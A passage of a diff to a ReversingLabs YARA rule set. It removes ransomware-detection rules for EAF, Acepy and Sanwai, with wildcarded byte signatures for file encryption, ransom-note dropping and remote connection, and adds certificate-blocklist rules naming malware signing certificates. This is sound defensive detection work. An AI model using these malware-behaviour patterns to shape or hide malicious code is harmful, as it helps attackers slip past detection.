?? ?? - ?? ?? 6A ?? A1 ?? ?? ?? ?? 8B 00 FF D0 4B 80 FB ?? 0F 85 ?? ?? ?? ?? 57 A1 ?? ?? ?? - ?? 8B 00 FF D0 8B 1D ?? ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 85 DB 74 ?? 6A ?? A1 - ?? ?? ?? ?? 8B 00 FF D0 EB ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8D 46 ?? BA - ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 FF 05 ?? ?? ?? ?? 57 A1 ?? - ?? ?? ?? 8B 00 FF D0 8D 46 ?? 50 6A ?? 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ?? - ?? ?? ?? 8B 00 FF D0 57 A1 ?? ?? ?? ?? 8B 00 FF D0 8B 1D ?? ?? ?? ?? 57 A1 ?? ?? ?? - ?? 8B 00 FF D0 85 DB 74 ?? 6A ?? A1 ?? ?? ?? ?? 8B 00 FF D0 EB ?? A1 ?? ?? ?? ?? BA - ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 - ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 52 50 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? BA - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 50 B8 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 5A 59 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? - ?? ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 89 45 ?? C6 45 ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? 8B - 5D ?? 4B 85 DB 7C ?? 43 33 F6 80 7D ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? - 8B 14 B2 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? - ?? ?? 8B 15 ?? ?? ?? ?? 8B 14 B2 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? - ?? ?? 88 45 ?? 46 4B 75 ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? 80 7D - ?? ?? 75 ?? 8B 5D ?? 4B 85 DB 7C ?? 43 33 F6 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B - 14 B2 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 46 4B 75 ?? BA ?? ?? - ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8B C8 B8 ?? ?? ?? ?? 5A E8 ?? ?? ?? ?? BA ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 - 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? - 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C8 B8 ?? ?? ?? - ?? 5A E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? - ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8B D3 B8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? FF 35 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 50 8B D3 B8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B D3 B8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? A1 - ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? - E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? A1 ?? ?? ?? ?? E8 - ?? ?? ?? ?? B2 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? - A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 - ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 - } - condition: - uint16(0)==0x5A4D and $find_files_and_encrypt and $remote_connection_1 and $remote_connection_2 + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yuanyuan Zhang" and pe.signatures[i].serial=="55:7b:0a:bf:44:04:58:27:f1:f3:6e:fb:c9:62:71:ec" and 1480291200<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_EAF : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_7903870184E18A80899740845A15E2B2 : INFO FILE { meta: - description = "Yara rule that detects EAF ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "6903030e-b1a1-5238-b377-ce8e4b18d3f3" - date = "2022-07-22" - modified = "2022-07-22" + id = "a55bed5b-906f-5c9d-bddd-b4d53d6351de" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.EAF.yara#L1-L89" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3d10c852f95e8aa9bcd3543b96650b98ac57bcd2aa2b374e0badb63b5a4c0396" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15846-L15862" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ad32491b463d0b3b4c85ed78e81bb69802e5f90ae835f73e270b28f02b36f840" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "EAF" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 00 03 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 39 ?? ?? ?? ?? 00 7E ?? - ?? ?? ?? 0C 03 28 ?? ?? ?? ?? 0D 03 28 ?? ?? ?? ?? 13 ?? 1E 8D ?? ?? ?? ?? 25 16 11 ?? - A2 25 17 72 ?? ?? ?? ?? A2 25 18 7E ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 25 1A 28 ?? - ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 25 1C 09 A2 25 1D 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? - 13 ?? 02 03 11 ?? 08 28 ?? ?? ?? ?? 13 ?? 11 ?? 2D ?? 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? - 2B ?? 16 13 ?? 11 ?? 2C ?? 00 00 03 11 ?? 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ?? 00 - 00 00 DE ?? 26 00 00 DE ?? 2A - } - $encrypt_files_p2 = { - 00 03 19 73 ?? ?? ?? ?? 0A 00 04 18 73 ?? ?? ?? ?? 0B 00 06 16 6A 6F ?? ?? ?? ?? 00 28 - ?? ?? ?? ?? 0C 00 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 05 09 73 ?? - ?? ?? ?? 13 ?? 00 08 17 6F ?? ?? ?? ?? 00 08 18 6F ?? ?? ?? ?? 00 08 11 ?? 1F ?? 6F ?? - ?? ?? ?? 6F ?? ?? ?? ?? 00 08 11 ?? 1F ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 08 6F ?? - ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 00 20 ?? ?? ?? ?? 13 ?? 11 ?? 8D ?? ?? ?? ?? 13 ?? 16 - 13 ?? 00 06 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? FE 02 16 FE 01 13 - ?? 11 ?? 2C ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 00 00 2B ?? 11 ?? 20 ?? ?? ?? ?? - 32 ?? 11 ?? 20 ?? ?? ?? ?? FE 02 16 FE 01 2B ?? 16 13 ?? 11 ?? 2C ?? 00 11 ?? 11 ?? 16 - 11 ?? 6F ?? ?? ?? ?? 00 00 2B ?? 11 ?? 20 ?? ?? ?? ?? 32 ?? 11 ?? 20 ?? ?? ?? ?? FE 02 - 16 FE 01 2B ?? 16 13 ?? 11 ?? 2C ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 00 00 2B ?? - 00 07 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 11 ?? 58 13 ?? 00 11 ?? 16 FE 03 13 ?? - 11 ?? 3A ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? - 00 DC 00 DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 00 DE ?? 08 2C ?? 08 6F ?? ?? ?? - ?? 00 DC 07 6F ?? ?? ?? ?? 00 00 DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 06 6F ?? ?? ?? - ?? 00 00 DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? 00 DC 03 28 ?? ?? ?? ?? 00 17 13 ?? DE ?? 26 - 00 16 13 ?? DE ?? 11 ?? 2A - } - $find_files_p1 = { - 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 16 0C 38 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0D 00 09 06 08 9A - 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 08 9A 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 09 FE 06 ?? - ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? - ?? ?? 2C ?? 11 ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 11 ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? - ?? 2B ?? 16 13 ?? 11 ?? 2C ?? 00 7E ?? ?? ?? ?? 06 08 9A 6F ?? ?? ?? ?? 00 00 00 08 17 - 58 0C 08 06 8E 69 FE 04 13 ?? 11 ?? 3A ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 16 - 13 ?? 2B ?? 00 07 11 ?? 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 07 11 ?? 9A 72 ?? ?? ?? - ?? 28 ?? ?? ?? ?? 2C ?? 07 11 ?? 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 07 11 ?? 9A 72 - ?? ?? ?? ?? 28 ?? ?? ?? ?? 2B ?? 16 13 ?? 11 ?? 2C ?? 00 07 11 ?? 9A 28 ?? ?? ?? ?? 00 - 00 00 11 ?? 17 58 13 ?? 11 ?? 07 8E 69 FE 04 13 ?? 11 ?? 2D ?? 00 DE ?? 26 00 00 DE ?? - 2A - } - $find_files_p2 = { - 00 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 73 ?? ?? ?? ?? 0C 08 06 07 9A 7D ?? ?? ?? ?? 00 08 7B - ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 08 7B ?? ?? ?? ?? 6F ?? - ?? ?? ?? 2B ?? 16 0D 09 2C ?? 00 08 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 - ?? ?? ?? ?? 00 00 00 07 17 58 0B 07 06 8E 69 32 ?? 00 DE ?? 26 00 00 DE ?? 2A - } - $destroy_exe_file = { - 00 1F ?? 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 0B 7E ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 0C 7E ?? - ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 08 72 ?? ?? ?? ?? 1B 8D ?? - ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 06 A2 25 18 72 ?? ?? ?? ?? A2 25 19 28 ?? ?? ?? - ?? A2 25 1A 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 00 - DE ?? 26 00 00 DE ?? 2A - } - condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ($destroy_exe_file) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Qool Aid, LLC" and pe.signatures[i].serial=="79:03:87:01:84:e1:8a:80:89:97:40:84:5a:15:e2:b2" and 1079654400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Acepy : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_5Fba9B373F812C16Aef531D4 : INFO FILE { meta: - description = "Yara rule that detects Acepy ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "3ffb45b1-6bde-5bf8-957e-433b9488ba91" - date = "2022-08-04" - modified = "2022-08-04" + id = "129e981a-064a-5930-bd45-d03ed008451c" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Acepy.yara#L1-L69" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "92c543a0b8c3c884f83647119d32c7b46f5fe839694bb8a8de0146c5c77bc587" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15864-L15880" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8b7340359778e3aa56f6ea300973af74eb77efd54108d2ca2b6b8f04d89a1c39" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Acepy" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? - 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? ?? ?? ?? 51 50 E8 ?? ?? ?? ?? - 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 45 ?? 8B 08 51 E8 ?? ?? ?? ?? - 83 C4 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? - E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? - B8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 - 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 - E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? - ?? ?? B8 ?? ?? ?? ?? C9 C3 - } - $encrypt_files = { - 55 89 E5 81 EC ?? ?? ?? ?? 90 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? - 89 45 ?? 8B 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? - ?? ?? B8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 - ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? B8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? - 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 40 50 B8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? - 89 45 ?? 8B 45 ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 - ?? B8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 4D ?? 39 C8 0F 83 ?? ?? ?? ?? E9 ?? ?? ?? ?? - 8B 45 ?? 89 C1 40 89 45 ?? EB ?? 8B 45 ?? 8B 4D ?? 01 C1 8B 45 ?? 8B 55 ?? 01 C2 8B - 45 ?? 50 89 4D ?? 89 55 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 8B 4D ?? 31 D2 - F7 F1 8B 45 ?? 01 D0 8B 4D ?? 0F BE 09 0F BE 10 31 D1 8B 45 ?? 88 08 EB ?? B8 ?? ?? - ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 B9 ?? ?? ?? ?? 51 50 E8 ?? - ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ?? - ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C9 C3 - } - $drop_ransom_note = { - 55 89 E5 81 EC ?? ?? ?? ?? 90 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? - 89 45 ?? 8B 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? - ?? ?? B8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 50 B8 ?? ?? ?? ?? 50 B8 - ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? - ?? ?? C9 C3 - } - condition: - uint16(0)==0x5A4D and (($find_files) and ($encrypt_files) and ($drop_ransom_note)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="5f:ba:9b:37:3f:81:2c:16:ae:f5:31:d4" and 1473329076<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Sanwai : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_616A5205238590B01D7B761E444E4Ad9 : INFO FILE { meta: - description = "Yara rule that detects Sanwai ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "01912621-4a34-5e34-8542-5b561e8da567" - date = "2021-11-11" - modified = "2021-11-11" + id = "09e9e481-c767-53d3-9af1-11dec636cafb" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Sanwai.yara#L1-L71" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a7a95b2403fe539dce0d856cc1c04d15440677ea39c0a22e818b42333a64e92c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15882-L15898" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "463ccd3ace9021569a7a6d5fcbaadf34b15d2b07baf3df526b271b547cf2bbc5" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Sanwai" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ?? - 33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 55 ?? 8B D9 83 7B ?? ?? 8B F3 8B 45 ?? 8B 7D - ?? 89 45 ?? 72 ?? 8B 33 8D 4E ?? 66 8B 06 83 C6 ?? 66 85 C0 75 ?? 2B F1 D1 FE 0F 84 - ?? ?? ?? ?? 3B 73 ?? 0F 85 ?? ?? ?? ?? 88 45 ?? 8D 55 ?? FF 75 ?? 8D 4D ?? C7 45 ?? - ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? C7 45 ?? ?? ?? ?? - ?? 50 8B CB E8 ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B - C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 ?? FF 15 ?? - ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7B ?? ?? 72 ?? 8B 1B 8B 75 ?? 57 56 53 E8 - ?? ?? ?? ?? 85 C0 75 ?? 8B 36 8B CF E8 ?? ?? ?? ?? 84 C0 74 ?? 57 56 E8 ?? ?? ?? ?? - 85 C0 75 ?? 8B CF E8 ?? ?? ?? ?? 84 C0 75 ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 - 5F 5E 5B 8B E5 5D C3 83 F8 ?? 75 ?? 8B 4D ?? D1 E9 F6 C1 ?? B9 ?? ?? ?? ?? 0F 45 C1 - 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C3 B8 ?? ?? ?? ?? 8B 4D ?? 64 89 - 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C3 - } - $import_key = { - 8D 44 24 ?? 50 6A ?? 6A ?? 6A ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 5E 85 - C0 75 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 32 C0 5F 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? - 83 C4 ?? C3 8B 44 24 ?? FF 74 24 ?? 8B 08 8B 40 ?? 89 47 ?? 8D 44 24 ?? 50 57 6A ?? - 6A ?? 6A ?? FF 74 24 ?? 89 0F FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 6A ?? - FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? B0 ?? 5F 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C3 - } - $encrypt_files = { - 8B 01 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EE ?? 73 ?? 8A 01 3A 02 75 ?? 83 FE ?? 74 ?? - 8A 41 ?? 3A 42 ?? 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? 33 C0 EB ?? - 1B C0 83 C8 ?? 85 C0 75 ?? 8B 5D ?? 8B 7D ?? C6 85 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B - BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B CF E8 ?? ?? ?? ?? 51 C6 